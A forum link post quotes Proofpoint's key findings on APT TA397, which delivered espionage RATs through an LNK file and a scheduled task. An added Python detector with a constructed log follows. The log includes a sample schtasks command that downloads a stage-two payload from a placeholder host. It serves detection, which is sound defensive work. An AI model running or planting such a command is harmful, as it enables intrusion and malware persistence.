Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs
(www.proofpoint.com)
from Joker@sh.itjust.works to cybersecurity@infosec.pub on 17 Dec 13:03
https://sh.itjust.works/post/29612635
> Key findings
> - Proofpoint observed advanced persistent threat (APT) TA397 targeting a Turkish defense sector organization with a lure about public infrastructure projects in Madagascar.
> - The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads.
> - TA397 was observed manually delivering WmRAT and MiyaRAT malware families in the final stages of this attack chain. Both malware families are designed to enable intelligence gathering and exfiltration.
> - Proofpoint assesses TA397 campaigns are almost certainly intelligence collection efforts in support of a South Asian government’s interests.
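As an added illustration from the defender's side (not part of the post or of Proofpoint's report): a small Python detector for the step the second bullet describes, where a shortcut (LNK) file ends up creating a scheduled task that pulls down further payloads. It runs over a constructed, Sysmon-style process-creation log whose field names, paths and hostnames are all assumptions, and flags `schtasks /create` when it is launched from a script host or when the task action reaches out to a URL. The script-host list and the log format are choices made for this example, not details taken from the report.

```python
import re
from dataclasses import dataclass

# Interpreters and script hosts that an LNK target typically runs through.
# This list is an assumption for the example, not taken from the report.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed Sysmon-style process-creation records, one per line.
# Paths, task names and the hostname are invented for this example.
CONSTRUCTED_LOG = r"""
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c schtasks /create /sc minute /mo 10 /tn OfficeUpdate /tr "curl http://files.example.invalid/stage2 -o %TEMP%\upd.exe"
ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks /create /sc minute /mo 10 /tn OfficeUpdate /tr "curl http://files.example.invalid/stage2 -o %TEMP%\upd.exe"
ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks /create /sc daily /tn VendorUpdate /tr "C:\Program Files\Vendor\update.exe"
ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks /query /tn OfficeUpdate
"""


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' record of the constructed log format."""
    fields = {}
    for part in line.strip().split("|"):
        key, value = part.split("=", 1)
        fields[key] = value
    return ProcEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def load_events(text: str) -> list:
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def task_action(command_line: str) -> str:
    """Return the /tr argument of a schtasks command line, without quotes."""
    m = re.search(r'/tr\s+("[^"]*"|\S+)', command_line, re.IGNORECASE)
    return m.group(1).strip('"') if m else ""


def classify(ev: ProcEvent):
    """Return a list of reasons if the event looks like a suspicious
    scheduled-task creation, or None if it is not interesting."""
    if basename(ev.image) != "schtasks.exe":
        return None
    if not re.search(r"(^|\s)/create\b", ev.command_line, re.IGNORECASE):
        return None  # /query, /delete, /run ... are not creations

    reasons = []
    parent = basename(ev.parent_image)
    if parent in SCRIPT_HOSTS:
        # A shortcut file runs its target through an interpreter such as
        # cmd.exe; an installer or management agent normally does not.
        reasons.append(f"schtasks /create spawned by script host {parent}")

    action = task_action(ev.command_line)
    if re.search(r"https?://", action, re.IGNORECASE):
        reasons.append("task action fetches from a remote URL")
    if action and basename(action.split()[0]) in SCRIPT_HOSTS:
        reasons.append("task action itself runs a script host")

    return reasons or None


def detect(events: list) -> list:
    """Return [(index, reasons)] for every event classify() flags."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in detect(load_events(CONSTRUCTED_LOG)):
        print(f"event {i}: " + "; ".join(reasons))
```

Only the second record fires (a `schtasks /create` launched from cmd.exe whose action downloads from a URL); the installer-created task and the `/query` call stay quiet. In production the same logic would consume real Sysmon Event ID 1 or Windows 4688 records and would also want the grandparent (explorer.exe opening the shortcut) and the user context.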